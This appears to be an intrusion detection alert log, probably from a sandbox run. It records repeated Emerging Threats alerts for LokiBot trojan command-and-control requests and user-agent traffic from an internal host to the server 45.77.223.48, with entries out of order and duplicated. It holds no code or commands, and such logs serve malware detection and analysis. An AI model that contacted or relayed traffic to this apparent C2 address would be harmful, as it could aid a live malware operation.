Timestamp:	04/25/24-09:43:22.887850
SID:	2021641
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:02.263836
SID:	2024318
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:23.788777
SID:	2024313
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:55.953898
SID:	2024318
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:42.568421
SID:	2024318
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:46.244048
SID:	2024313
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:52.171897
SID:	2021641
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:23.788777
SID:	2024318
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:55.953898
SID:	2024313
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:26.739380
SID:	2024313
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:35.562440
SID:	2021641
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:49.681959
SID:	2021641
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:20.366841
SID:	2024318
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:52.470303
SID:	2024313
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:20.366841
SID:	2024313
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:46.244048
SID:	2024318
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:52.470303
SID:	2024318
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:33.541899
SID:	2024313
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:26.739380
SID:	2024318
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:33.541899
SID:	2024318
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:42.568421
SID:	2024313
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:11.222525
SID:	2024313
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:39.921949
SID:	2021641
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:10.231973
SID:	2021641
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:11.222525
SID:	2024318
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:41:58.700835
SID:	2021641
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:51.138012
SID:	2021641
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:04.035271
SID:	2021641
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:53.510184
SID:	2024313
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:47.218743
SID:	2024318
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:32.856501
SID:	2024318
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:29.212593
SID:	2021641
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:36.805880
SID:	2024318
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:42.452935
SID:	2021641
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:00.985732
SID:	2021641
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:53.510184
SID:	2024318
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:32.856501
SID:	2024313
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:43.798730
SID:	2024313
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:43.798730
SID:	2024318
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:57.993136
SID:	2021641
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:47.218743
SID:	2024313
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:22.438278
SID:	2021641
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:04.713098
SID:	2021641
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:26.688177
SID:	2024318
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:08.607822
SID:	2024318
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:26.688177
SID:	2024313
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:08.607822
SID:	2024313
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:48.680283
SID:	2021641
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:37.405098
SID:	2024313
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:58.404316
SID:	2021641
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:22.887850
SID:	2024318
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:30.405107
SID:	2024313
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:02.263836
SID:	2024313
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:43.818013
SID:	2024318
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:07.189244
SID:	2021641
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:13.826993
SID:	2021641
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:37.405098
SID:	2024318
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:30.405107
SID:	2024318
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:36.181912
SID:	2024313
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:36.181912
SID:	2024318
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:36.805880
SID:	2024313
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:43.818013
SID:	2024313
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:19.955290
SID:	2021641
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:11.469231
SID:	2024313
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:22.887850
SID:	2024313
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:55.953898
SID:	2021641
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:35.562440
SID:	2024318
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:49.906919
SID:	2024313
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:27.987761
SID:	2024318
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:49.906919
SID:	2024318
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:31.634111
SID:	2021641
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:27.987761
SID:	2024313
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:24.107780
SID:	2024318
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:20.366841
SID:	2021641
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:12.681066
SID:	2024318
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:24.107780
SID:	2024313
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:17.524612
SID:	2024318
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:52.470303
SID:	2021641
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:17.524612
SID:	2024313
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:48.461124
SID:	2024313
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:11.469231
SID:	2024318
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:54.719782
SID:	2021641
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:01.045653
SID:	2024313
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:04.035271
SID:	2024318
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:25.348509
SID:	2021641
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:51.138012
SID:	2024313
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:41:57.336379
SID:	2021641
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:04.035271
SID:	2024313
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:32.329146
SID:	2021641
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:48.461124
SID:	2024318
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:01.045653
SID:	2024318
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:51.138012
SID:	2024318
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:36.805880
SID:	2021641
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:32.856501
SID:	2021641
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:38.643235
SID:	2024318
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:42.452935
SID:	2024318
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:57.993136
SID:	2024313
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:42.452935
SID:	2024313
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:43.798730
SID:	2021641
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:34.955343
SID:	2024318
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:34.955343
SID:	2024313
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:15.058675
SID:	2021641
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:18.729353
SID:	2021641
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:22.438278
SID:	2024318
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:22.438278
SID:	2024313
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:31.102796
SID:	2024313
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:08.607822
SID:	2021641
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:31.102796
SID:	2024318
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:38.643235
SID:	2024313
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:26.688177
SID:	2021641
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:08.999268
SID:	2021641
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:12.681066
SID:	2021641
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:58.404316
SID:	2024318
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

